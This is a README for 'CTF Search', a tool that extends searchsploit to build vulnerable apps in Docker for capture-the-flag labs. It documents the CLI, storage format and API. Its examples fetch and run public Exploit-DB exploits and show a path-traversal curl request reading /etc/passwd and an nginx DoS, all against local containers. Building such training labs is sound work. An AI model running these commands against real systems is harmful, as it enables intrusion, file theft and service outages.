# CTF Search

Expands searchsploit with a -b (--build) option that tries to do an automatic download and setup of a vulnerable app in docker.

Manual setup is also available. Manual setup downloads a vulnerable app if found, and lets the user select one of the template setups.

When a template-setup is attempted (either auto or manual) the program tries to setup a docker container with the vulnerable app and it's dependencies. Note that a template-setup is only considered a general starting-point and will likely need manual modification: e.g. in Dockerfiles, docker-compose.yml, exposed ports, additional dependencies, etc. 

Also has functionality for storing, listing and building manually adapted CTF challenges that are stored locally. 

## Dependencies

Be sure to have installed the following: wget, unzip, tar, docker, docker-compose

## Setup
CTFSearch uses python3. Be sure to install the required dependencies by running:

    pip3 install -r requirements.txt

NOTE: Be sure to be in the ctf-search/exploitdb directory when running any of the following scripts. This is due to the way python handles relative paths based on the directory you are running the script from. 


## Usage - searchsploit:
    -b, --build  [EDB-ID]    Tries to find the app URL, then download and setup the vulnerable app in docker. 

### Example:
    searchsploit -b 47044

## Usage (ctfcli.py ):
    python3 ctfsetup/ctfcli.py build-auto
    python3 ctfsetup/ctfcli.py build-auto [EDB/CVE-ID]
    python3 ctfsetup/ctfcli.py build-manual
    python3 ctfsetup/ctfcli.py build-manual [EDB/CVE-ID]

    python3 ctfsetup/ctfcli.py list-setups
    python3 ctfsetup/ctfcli.py list-setups [EDB/CVE-ID]

    python3 ctfsetup/ctfcli.py add-setup [EDB/CVE-ID] [archive.zip]
    python3 ctfsetup/ctfcli.py add-setup-dir [EDB/CVE-ID] [directory]

    python3 ctfsetup/ctfcli.py build-setup [edb_id_num.zip]

    python3 ctfsetup/ctfcli.py add-user [username]
    python3 ctfsetup/ctfcli.py list-users
    python3 ctfsetup/ctfcli.py set-rating [username] [EDB/CVE-ID] [rating]
    python3 ctfsetup/ctfcli.py list-ratings [username]
    python3 ctfsetup/ctfcli.py delete-rating [username] [EDB/CVE-ID]

    python3 ctfsetup/ctfcli.py set_player_rating [username] [EDB/CVE-ID] --funness 5 --difficulty 3
    python3 ctfsetup/ctfcli.py list-player-ratings
    
    python3 ctfsetup/ctfcli.py search [query-string] --n [numOfResults] --user [username] --exclude [terms] --case --ignore-stopwords --app-urls --no-recommendations --vuln-type [edb/cve/all]

    python3 ctfsetup/ctfcli.py update-vulns
    

### Examples:
    python3 ctfsetup/ctfcli.py build-auto 47044
    python3 ctfsetup/ctfcli.py build-manual 47044

    python3 ctfcli.py list-setups 47044
    python3 ctfcli.py add-setup 47044 app_and_setup.zip
    python3 ctfcli.py build-setup edb_47044_1.zip
    
    python3 ctfsetup/ctfcli.py list-setups 47044
    python3 ctfsetup/ctfcli.py add-setup 47044 app_and_setup.zip
    python3 ctfsetup/ctfcli.py build-setup edb_47044_1.zip

    # Linux custom kernel build:
    python3 ctfsetup/ctfcli.py build-auto 47165


## CTF store - stored CTF format

When storing a CTF challenge with ctfstore.py a docker-compose.yml file is expected. Application files generally lie in the root of the archive. 

    .
    ├── [application files/dirs]     # Application files/dirs
    ├── Dockerfile                   # Dockerfile used by yml (optional) 
    └── docker-compose.yml           # Docker compose yml file - runs when performing "ctfcli build-setup"


## Supported Types
### WebApps:
* Webapp PHP
* Webapp Python
* Webapp Linux

### WebServers:
* Webserver Apache - user can specify version
* Webserver Nginx - user can specify version

### OS - using docker host kernel:
* Linux Debian (ssh access for user "ctf")
* Linux Ubuntu

### OS - custom kernel:
* Debian stable (i386 and x86_64) (ssh access for user "ctf")
* Linux kernel (5.x, 4.x, 3.x) (see [limitations](exploitdb/ctfsetup/qemu/Readme.md))

### Other:
* Empty Dockerfile and docker-compose.yml

## Examples

### PHP WebApp (EDB-ID 48529)

    $ ./searchsploit -b 48529

URL = host:port

Port is found with "docker ps". 
Host is "localhost" or "ctf.idi.ntnu.no".

Note: In dbConnection.php, change host url "localhost" to "db". This is commonly needed when setting up a PHP app with docker using ctfsetup. Manually fix any PHP or MySQL version or compatibility issues for this specific webapp.

### Linux App - Local (EDB-ID 152)

Docker Host:

    $ ./searchsploit -b 152
    $ docker up -it <contanter> /bin/sh

Docker Container - Install:

    $ ./configure
    $ make -ki
    $ make install

Docker Container - Exploit:

    $ wget https://www.exploit-db.com/download/152
    $ mv 152 152.c
    $ gcc 152.c
    $ ./a.out

### Linux App - Remote (EDB-ID 14925)

Docker Host:

    $ ./searchsploit -b 14925

    Alter docker files to map ports host<->container if needed. 

    $ docker up -it <contanter> /bin/sh
        or
    $ docker up -it <contanter> bash

Docker Container - Install:

    Change -lpthread to -pthread in Makefile.

    $ make
    $ ./weborf -p 8081 -b /var/log


Docker Container, Docker Host or remote machine - Exploit:

    $ apt-get install -y curl
    $ curl localhost:8081/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

Adding a flag:

A flag (in this case a file) can be added e.g. at root level: /secret.txt. 
The secret file with the flag is then found by doing a GET request to localhost:8081/..%2f..%2f..%2f..%2f..%2f..%2f..%2fsecret.txt.

### Apache Webserver (EDB-ID 132)

Docker Host:

    $ ./searchsploit -b 132

    Verify running container and note port number with
    $ docker ps

    Run exploit:
    $ wget -O exploit.c https://www.exploit-db.com/download/132
    $ gcc exploit.c
    $ echo "qwerty" >> users.txt
    $ echo "root" >> users.txt
    $ echo "abcd" >> users.txt
    $ echo "evil" >> users.txt
    $ ./a.out -t localhost -p [port] -u users.txt


### Nginx Webserver (EDB-ID 25499)

Docker Host:

    $ ./searchsploit -b 25499
    Enter version number 1.4.0 when asked for a nginx version.

    Verify running container and note port number with
    $ docker ps

    Visit webpage and verify it shows as expected.
    127.0.0.1:[port]

    run exploit
    $ wget -O exploit.py https://www.exploit-db.com/download/25499
    $ python exploit.py 127.0.0.1:[port]

    Visit webpage and verify that it is not reachable due to DoS.
    127.0.0.1:[port]

## CTF API

Run 'docker-compose up' in directory ctf-search/exploitdb, or run 'python3 ctfsetup/ctfapi.py'.

### /api/users

Returns a list of all users.

Method: GET

### /api/create-user

Creates a user.

Method: POST

Body: {username="some_user"}


### /api/vuln/:vuln_id

Returns a vulnerability.

Method: GET

Parameters: vuln_id=[string]


### /api/ratings

Returns a list of all ratings.

Method: GET


### /api/search

Returns vulnerabilities based on search query and additional parameters.

Method: GET

Parameters: q=[string], count=[integer, optional, default=10], user=[string, optional], exclude=[string, optional], v_type=[string, optional, default="all"]


### /api/setups

Returns a list of all available setup-files, or setup-files for a vulnerability if v_id is specified.

Method: GET

Parameters: v_id=[string, optional]


### /api/setup/:setup_name

Returns the specifiec setup-file.

Method: GET


### /api/store-setup

Stores file for vulnerability.

Method: POST

Form: file=[file], v_id=[int]